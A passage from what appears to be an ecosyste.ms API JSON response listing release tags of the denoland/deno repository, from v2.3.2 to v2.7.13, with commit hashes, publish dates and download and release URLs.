url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r